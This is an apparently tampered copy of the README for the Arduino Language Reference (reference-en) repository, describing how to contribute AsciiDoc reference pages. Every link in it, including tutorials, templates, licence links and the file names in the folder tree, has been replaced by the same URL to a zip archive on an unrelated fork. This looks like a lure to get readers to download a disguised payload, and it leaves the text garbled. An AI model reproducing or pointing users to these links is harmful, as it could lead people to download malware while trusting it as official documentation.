= Reference-en

Reference-en is the repo for the Language Reference documentation of the Arduino syntax in **English**.  
All the Reference terms files are in AsciiDoc format.

Thank you for taking the time to contribute to Arduino content, this is really helpful to the whole Arduino Community. If you want to learn more about how to contribute to this project, please check https://raw.githubusercontent.com/BobbyGuyG/reference-en/master/Language/Functions/Trigonometry/reference-en-v2.8.zip[this step by step tutorial].

== Content Creation and Editing
If you want to contribute new content, create a new file (with any text or code editor) and save it as .adoc.  
Do not use parenthesis or any special character in the file name.  
In https://raw.githubusercontent.com/BobbyGuyG/reference-en/master/Language/Functions/Trigonometry/reference-en-v2.8.zip[`reference-en/AsciiDoc_sample/AsciiDoc_Dictionary`] you will find an overview of the AsciiDoc syntax. This includes Titles, Text, Links, Images, Tables, Code and various embeds (video, slideshow, audio, and code). You can see it rendered https://raw.githubusercontent.com/BobbyGuyG/reference-en/master/Language/Functions/Trigonometry/reference-en-v2.8.zip[here].

If you want to contribute to the Language Reference or edit existing content, you can find two templates in reference-en/AsciiDoc_sample/Reference_Terms:

* Use https://raw.githubusercontent.com/BobbyGuyG/reference-en/master/Language/Functions/Trigonometry/reference-en-v2.8.zip[`https://raw.githubusercontent.com/BobbyGuyG/reference-en/master/Language/Functions/Trigonometry/reference-en-v2.8.zip`] (rendered https://raw.githubusercontent.com/BobbyGuyG/reference-en/master/Language/Functions/Trigonometry/reference-en-v2.8.zip[here]) for terms such as https://raw.githubusercontent.com/BobbyGuyG/reference-en/master/Language/Functions/Trigonometry/reference-en-v2.8.zip[analogWrite].
* Use https://raw.githubusercontent.com/BobbyGuyG/reference-en/master/Language/Functions/Trigonometry/reference-en-v2.8.zip[`https://raw.githubusercontent.com/BobbyGuyG/reference-en/master/Language/Functions/Trigonometry/reference-en-v2.8.zip`] (rendered https://raw.githubusercontent.com/BobbyGuyG/reference-en/master/Language/Functions/Trigonometry/reference-en-v2.8.zip[here]) for groups of functions such as https://raw.githubusercontent.com/BobbyGuyG/reference-en/master/Language/Functions/Trigonometry/reference-en-v2.8.zip[Serial].

Please note that every Reference file should include at least a Description, some Example Code, and links to other relevant info (See Also section). 

If you need to add images to the Asciidoc please create a folder called attachments in the same directory as the Asciidoc file. Images can be saved in SVG and PNG format, max size 200KB.

== Contribute Content on Github
If you are not familiar with Git you can contribute content directly on Github via their online interface. We put together a short Tutorial to show you how - https://raw.githubusercontent.com/BobbyGuyG/reference-en/master/Language/Functions/Trigonometry/reference-en-v2.8.zip[CHECK IT OUT!]

https://raw.githubusercontent.com/BobbyGuyG/reference-en/master/Language/Functions/Trigonometry/reference-en-v2.8.zip[You can also follow this guide] (written by the Github team) to learn how to edit an .adoc file and propose a file change to the Arduino team.  
When suggesting a change, please follow the guidelines described in the Reference template files.


== Submitting a pull request
We are glad you want to contribute to the Arduino Reference: that's the best way to help the community.

Your contribution is adding or modifying existing code or full descriptions, please always refer to an existing issue or open a new one before contributing. 

=== Folder Structure
[source]
----
reference-en
├─ AsciiDoc_sample
│   ├── AsciiDoc_Dictionary
│   │   ├── https://raw.githubusercontent.com/BobbyGuyG/reference-en/master/Language/Functions/Trigonometry/reference-en-v2.8.zip
│   │   └── attachments
│   └── Reference_Terms
│       ├── https://raw.githubusercontent.com/BobbyGuyG/reference-en/master/Language/Functions/Trigonometry/reference-en-v2.8.zip
│       ├── https://raw.githubusercontent.com/BobbyGuyG/reference-en/master/Language/Functions/Trigonometry/reference-en-v2.8.zip
│       └── attachments
├── Language
│   ├── Functions
│   ├── Structure
│   └── Variables
├── https://raw.githubusercontent.com/BobbyGuyG/reference-en/master/Language/Functions/Trigonometry/reference-en-v2.8.zip
└── https://raw.githubusercontent.com/BobbyGuyG/reference-en/master/Language/Functions/Trigonometry/reference-en-v2.8.zip

----

Within the Language folder, the file tree follows the same structure as in the https://raw.githubusercontent.com/BobbyGuyG/reference-en/master/Language/Functions/Trigonometry/reference-en-v2.8.zip[Arduino Reference webpage]

=== License

Please note that your contribution to the Arduino Reference is licensed under a Creative Commons Attribution-Share Alike 3.0 License. see https://raw.githubusercontent.com/BobbyGuyG/reference-en/master/Language/Functions/Trigonometry/reference-en-v2.8.zip

https://raw.githubusercontent.com/BobbyGuyG/reference-en/master/Language/Functions/Trigonometry/reference-en-v2.8.zip[Creative Commons License, title="Creative Commons License"] This work is licensed under a https://raw.githubusercontent.com/BobbyGuyG/reference-en/master/Language/Functions/Trigonometry/reference-en-v2.8.zip[Creative Commons Attribution-ShareAlike 3.0 Unported License].
